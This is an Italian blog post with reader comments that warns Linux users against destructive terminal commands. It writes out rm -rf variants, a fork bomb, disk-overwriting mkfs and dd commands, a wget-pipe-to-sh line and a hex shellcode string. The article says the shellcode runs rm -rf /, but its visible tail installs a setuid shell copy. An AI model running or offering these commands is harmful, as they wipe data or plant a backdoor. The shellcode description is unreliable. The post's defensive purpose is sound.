>
MENU
L'interfaccia di installazione guidata o di avvio della modalità Live è rimasta invariata. Qui è possibile scegliere la lingua di sistema

Ubuntu 12.10: tutte le novità del nuovo rilascio (con...

upgrade1

Ubuntu 12.10: aggiornamento dalla 12.04 in un clic

23 ottobre 2012 Commenti (8) Visualizzazioni: 1162 HowTo

Alcuni comandi da non lanciare mai su GNU/Linux!

Il terminale è indubbiamente il metodo più veloce per fare molte operazioni, anche se non è di certo il metodo più sicuro per farlo. Basta un carattere sbagliato e anziché un file inutile si rischia di cancellare informazioni importanti.


Alcune volte, quando ad esempio si chiede aiuto su IRC o qualsiasi altra chat o forum, alcuni utenti più esperti possono, per scherzo o per danneggiare volontariamente il malcapitato, consigliare comandi decisamente non salutari per il nostro sistema. �? importante imparare a riconoscere alcuni dei comandi pericolosi più comuni in modo da poterli evitare.

Prima di tutto è importante seguire una regola fondamentale: cercare sempre di capire quello che si sta per eseguire. Se si evitano comandi scritti in “strani linguaggi” (si vedrà qualche esempio più avanti), o semplicemente si cerca nelle pagine di manuale cercando di capire il significato dei caratteri che si stanno eseguendo, di sicuro i rischi saranno minori.

Per ovvi motivi va assolutamente evitato di provare i comandi che verranno descritti, a meno che non vogliate creare danni, alcune volte irreversibili, alla vostra macchina. Il più comune tra i comandi consigliati, ed anche quello da evitare assolutamente per non ritrovarsi senza i propri file personali, è:

rm -rf /

questo comando non fa altro che cancellare tutti i file presenti a partire dalla radice del file system, assolutamente senza chiedere conferma e senza segnalare alcunché. Esso è composto da rm, comando che elimina i file specificati come parametro e -rf che effettua l’operazione ricorsivamente (esegue rm -rf anche nelle cartelle presenti nel path su cui viene eseguito il comando).

Infine la directory su cui eseguire il comando è / ossia la directory radice che contiene tutto quello presente sul computer. Questa versione del comando può essere eseguita solo come root.

Il comando rm -rf è comunque sempre pericoloso, vi possono essere infatti infinite varianti, come ad esempio:

rm -rf ~

che rimuoverà tutti i file presenti nella propria cartella home (identificata dal carattere ~), in questo caso non è neanche richiesta l’esecuzione come utente root. Infine:

rm -rf .*

rimuove tutti i file e le cartelle nascoste contenuti nella directory in cui viene eseguito (attenzione che solitamente i file nascosti contengono tutte le configurazioni dei vari programmi). Prestate dunque molta attenzione prima di eseguire rm -rf.

Ancora un comando utilissimo se si vuol fare pulizia nella propria home directory:

mv ~ /dev/null

praticamente è come spostare (non copiare, quindi le i file di partenza vengono cancellati) la propria home directory in un buco nero (/dev/null) dal quale non potrà quindi essere più recuperata.

Purtroppo non sempre è chiaro quello che si sta eseguendo, questo ad esempio è un pezzo di codice che esegue esattamente il comando rm -rf / spiegato prima:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Come si può vedere questa versione esadecimale del codice non è per niente chiara ma è ugualmente pericolosa.

Un altro comando “offuscato”:

:(){ :|: & };:

Questa semplice e simpatica linea, se dovesse essere eseguita, diventa una vera e propria bomba per la macchina. Essa infatti non è altro che una funzione bash che si auto“clona” fino a saturare le risorse della macchina su cui viene eseguita. �? possibile usare questo comando anche come utente normale.
Come si è potuto vedere dai precedenti due comandi, occorre prestare molta attenzione prima di eseguire qualcosa che non è perfettamente chiara.

Ora alcuni comandi pericolosi per le partizioni dati:

mkfs.ext4 /dev/sda1

il comando formatta la partizione contenuta in /dev/sda1 (la prima partizione del disco che sicuramente è in uso da qualche sistema operativo) creando una nuova (e pulitissima) partizione ext4. �? l’equivalente di format C: su Windows. Il comando può variare con diversi tipi di file system (ext3, vfat, ntfs al posto di ext4) ma può anche variare il device su cui si scrive. Ancora:

commando > /dev/sda

scrive l’output del comando eseguito (anche un banalissimo ls) direttamente sul disco rigido, danneggiando il file system. E infine:

dd if=/dev/random of=/dev/sda

il comando dd copia dati random (leggendoli da /dev/random) direttamente sul disco rigido, ottenendo lo stesso risultato del comando precedente. Questi esempi dimostrano come è estremamente pericoloso eseguire operazioni di scrittura direttamente sui device corrispondenti alle varie partizioni o ai vari dischi fissi (/dev/sda, /dev/sdb, /dev/sdc1, etc..).

Ultimo comando, questa volta solo potenzialmente pericoloso:

wget http://example.com/something -O – | sh


non fa altro che scaricare la pagina contenuta all’indirizzo indicato ed eseguire direttamente il codice sul nostro computer. Se quindi sul sito c’è uno script pericoloso, eseguendo questo comando lo eseguiremo senza neanche accorgerci di cosa effettivamente esso faccia.

Come è stato dimostrato il terminale è potentissimo, ma per usare correttamente tanta potenza è necessario, ovviamente, avere un po’ di conoscenza per poter comprendere cosa si esegue e quindi per evitare di fare danni irreparabili.

Il terminale è indubbiamente il metodo più veloce per fare molte operazioni, anche se non è di certo il metodo più sicuro per farlo.

FONTE: How To Geek

twittergoogle_pluslinkedinmail

8 Responses to Alcuni comandi da non lanciare mai su GNU/Linux!

  1. matteo pomponi scrive:

    fortuna che un untente linux … non è un utente windows.

    • Alessandro Di Stefano scrive:

      Si infatti ormai gli utenti Microsoft sapendo dell esistenza del fenomeno phishing o trojan o simili sono più cauti di utenti ubuntu convinti dell’ immunità di linux che quindi anche solo per provare li lanciano convinti che non gli possa accadere niente. Diciamocelo quanti utenti windows nel 2012 non sanno che non devono cliccare su link sconosciuti? secondo me sono meno degli utenti ubuntu (ultimamente sempre meno preparati) che convinti dell’ immunità di linux eseguono di tutto. Parlo di soli utenti Ubuntu, utenti di altre distro sono sicuramente più preparati e quindi più cauti

      • Livingstone scrive:

        Tutto questo sillogismo per dire che non hai ben chiaro cosa sia Gnu/Linux? Sono i .exe (Winzozz) che si eseguono, su linux i programmi si installano dai repository (controllati dalla comunità). Un utente linux che esegue un .deb, o un .rpm, o uno script bash di provenienza sconosciuta, non può essere un utente linux. �? vero, noi utenti linux possiamo permetterci il lusso di cliccare su qualsiasi link senza temere niente, solo per il gusto di vedere l’effetto che fa. Certo, un ipotetico pericolo potrebbe arrivare da qualche java script, ma un utente linux sa anche questo, compreso gli utenti Ubuntu. Uso Fedora e Archlinux oggi, ma sono cresciuto a pane e Ubuntu. In 10 anni di Linux non ho mai preso un virus (non si può, non esistono, a meno che non si voglia credere a leggende metropolitane di vario tipo).

        • Alessandro Di Stefano scrive:

          Nemmeno questi sono virus, stai dicendo che non conosci la differenza tra virus e malware?
          Questi sono malware e di preciso se li trovi scritti da qualche parte come comandi utili e non lo sono sono trojan (che si spacciano per qualcosa di utile e non lo sono) e phishing. Questo tipo di minacce si basa sull’ ignoranza dell’ utente e ingannando l’ utente stesso è poi l’ utente a eseguire codice malevolo qualsiasi sia il sistema operativo (almeno che il SO non ti lasci la libertà personale di scegliere cosa eseguire o meno).

          Sebbene è vero che i repository Canonical siano controllati, non lo sono i PPA personali degli utenti che trovi nei vari blog, non lo sono i file sh che trovi a giro e a quanto pare nemmeno i temi di Gnome look dato che qualche tempo fa c’ era un trojan in uno dei suoi temi.

          L’ articolo inoltre non parla di exe ma di comandi da terminale Linux per fare danni a Linux e io ho parlato di utenza che lancia comandi trovati qua e la per la sua convinzione Linux sia immune e tu me lo hai appena confermato. Linux sarà immune ma l’ utente no e l’ utente Ubuntu è sempre meno preparato. Basta vedere il forum di ubuntu per vedere la domanda media.

          Se qualcuno sa quel che fa che usi MAC, Windows o Linux è al sicuro lo stesso.
          Io ad esempio non ho mai preso niente (e non solo virus ma parlo anche di spyware e malware generico) nemmeno su windows perché il mio windows è hardened (uso di account limitato, account amministratore protetto da pass, UAC settato al massimo)

  2. Alessandro Di Stefano scrive:

    Nemmeno questi sono virus, stai dicendo che non conosci la differenza tra virus e malware?
    Questi sono malware e di preciso se li trovi scritti da qualche parte come comandi utili e non lo sono sono trojan (che si spacciano per qualcosa di utile e non lo sono) e phishing. Questo tipo di minacce si basa sull’ ignoranza dell’ utente e ingannando l’ utente stesso è poi l’ utente a eseguire codice malevolo qualsiasi sia il sistema operativo (almeno che il SO non ti lasci la libertà personale di scegliere cosa eseguire o meno).

    Sebbene è vero che i repository Canonical siano controllati, non lo sono i PPA personali degli utenti che trovi nei vari blog, non lo sono i file sh che trovi a giro e a quanto pare nemmeno i temi di Gnome look dato che qualche tempo fa c’ era un trojan in uno dei suoi temi.

    L’ articolo inoltre non parla di exe ma di comandi da terminale Linux per fare danni a Linux e io ho parlato di utenza che lancia comandi trovati qua e la per la sua convinzione Linux sia immune e tu me lo hai appena confermato. Linux sarà immune ma l’ utente no e l’ utente Ubuntu è sempre meno preparato. Basta vedere il forum di ubuntu per vedere la domanda media.

    Se qualcuno sa quel che fa che usi MAC, Windows o Linux è al sicuro lo stesso.
    Io ad esempio non ho mai preso niente (e non solo virus ma parlo anche di spyware e malware generico) nemmeno su windows perché il mio windows è hardened (uso di account limitato, account amministratore protetto da pass, UAC settato al massimo)

  3. ukayp scrive:

    ciao, sicuro che si possa spostare una dir in /dev/null?
    http://en.wikipedia.org/wiki//dev/null

  4. ukayp scrive:

    ciao, sicuro che si possa spostare una dir in /dev/null

    http://en.wikipedia.org/wiki//dev/null

  5. Andreabont scrive:

    Ok, se uno è un competo idiota può distruggere tutto, può anche mettere l’HDD nel forno a microonde XD

Lascia una risposta

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *